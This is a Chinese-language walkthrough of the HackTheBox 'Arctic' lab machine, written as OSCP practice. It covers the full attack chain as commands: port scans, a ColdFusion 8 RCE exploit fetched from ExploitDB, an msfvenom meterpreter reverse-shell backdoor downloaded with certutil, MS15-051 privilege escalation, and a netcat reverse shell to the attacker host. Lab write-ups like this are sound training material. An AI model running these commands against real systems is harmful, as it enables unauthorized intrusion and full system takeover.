渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

admin

138876
文章

114
评论

2022年10月18日17:50:53评论47 views字数 1929阅读6分25秒阅读模式

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

靶机信息

靶机地址:

 https://app.hackthebox.com/machines/Arctic

靶场: HackTheBox.com

靶机名称:Arctic

难度: 简单

提示信息:

无

目标: user.txt和root.txt

实验环境

 攻击机:Kali 10.10.16.3
 
 靶机:10.10.10.11

信息收集

扫描端口

扫描靶机开放的服务端口

 sudo masscan -p1-65535 -i tun0 10.10.10.11 --max-rate 1000

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

 sudo nmap -sC -sV -p 135,49154,8500 10.10.10.11 -oN nmap.log

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

只扫到3个端口，未发现可利用的信息，来看看这个8500端口

漏洞利用(Exploitation)

telnet看看端口是否会返回信息

 telnet 10.10.10.11 8500

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

没有任何信息，试试HTTP访问

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

HTTP可以访问，发现两个目录，访问看看

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

目录下发现一些页面点击访问

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

Macromedia这不是2000左右最出名的网页三剑客公司吗，再找找

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

发现重点了“coldfusion 8”，来找找是否存在漏洞

 https://www.exploit-db.com/

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

选两个来试试，先来RCE

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

2009年的漏洞使用的python3脚本，下载exp

 wget https://www.exploit-db.com/download/50057

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

下载后修改下文件扩展名（不改也行看心情），与代码部分的反弹地址

 mv 50057 exp.py
 vim exp.py

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

执行exp

 py3 exp.py

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

拿到shell先找下flag

cd c:users
dir

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

发现两个用户

 cd tolis
 tree /f

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

桌面上发现user.txt

type desktopuser.txt

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

拿到第一个flag，继续收集信息

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

发现是一台windows 2008 R2服务器没有打过任何补丁，用msfvemon生成个个后门，连接到msf中再来提权。

提权(Privilege Escalation)

1。生成后门

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.3 LPORT=4444 -f exe > shell.exe

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

2。上传后门

攻击机开启HTTP服务

py3 -m http.server

靶机下载shell.exe

certutil -urlcache -split -f http://10.10.16.3:8000/shell.exe

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

3。上线msf

攻击机开启msf并设置监听

 msfconsole
 use exploit/multi/handler
 set payload windows/meterpreter/reverse_tcp
 set LHOST 10.10.16.3
 run

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

靶机执行shell.exe

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

反弹成功，迁移进程(自动迁移一般情况都是迁移到Notepad.exe)

 run post/windows/manage/migrate

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

开始提权

 background
 search local_exploit
 show options
 set session 1
 run

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

提权失败，换Bastard靶机中的MS15-051来提权

 cp ../Bastard/MS15-051-KB3045171/ms15-051x64.exe .
 py3 -m http.server

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

靶机下载exp

certutil -urlcache -split -f http://10.10.16.3:8000/ms15-051x64.exe

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

上传成功，来验证下

ms15-051x64.exe whoami

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

验证成功，接下来可以通过使用ms15-051x64.exe这个exp来执行nc反弹shell到攻击机上达到直接控制目标机品的目地。

首先在攻击机上nc64.exe目录下开启HTTP服务并监听3333端口，然后靶机下载nc64.exe，再通过ms15-051x64.exe来执行nc反弹

开启HTTP服务

py3 -m http.server

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

监听3333端口

nc -lnvp 3333

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

靶机下载nc64.exe

certutil -urlcache -split -f http://10.10.16.3:8000/nc64.exe

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

靶机执行反弹

ms15-051x64.exe "nc64.exe 10.10.16.3 3333 -e cmd"

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

反弹成功，拿到system权限，来找找flag

cd ../administrator

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

同样root.txt放在管理员桌面上

 type desktoproot.txt

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

拿到root.txt，游戏结束

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

原文始发于微信公众号（伏波路上学安全）：渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

渗透测试靶机练习No.127 HTB:Arctic(OSCP Prep)

靶机信息

实验环境

信息收集

扫描端口

漏洞利用(Exploitation)

提权(Privilege Escalation)

对抗性机器学习-攻击和缓解的分类和术语（三）

记一次带学员渗透母校

Nosql注入学习记录

SQL注入漏洞实战

基于K8s日志审计实现攻击行为检测

Dr4g0n b4ll_1

XSS目前Web中的另类利用场景和绕Waf的Payload分享|挖洞技巧

文件上传黑名单限制的绕过总结

metasploit（1）生成远控木马

Ghost

发表评论

在线咨询

微信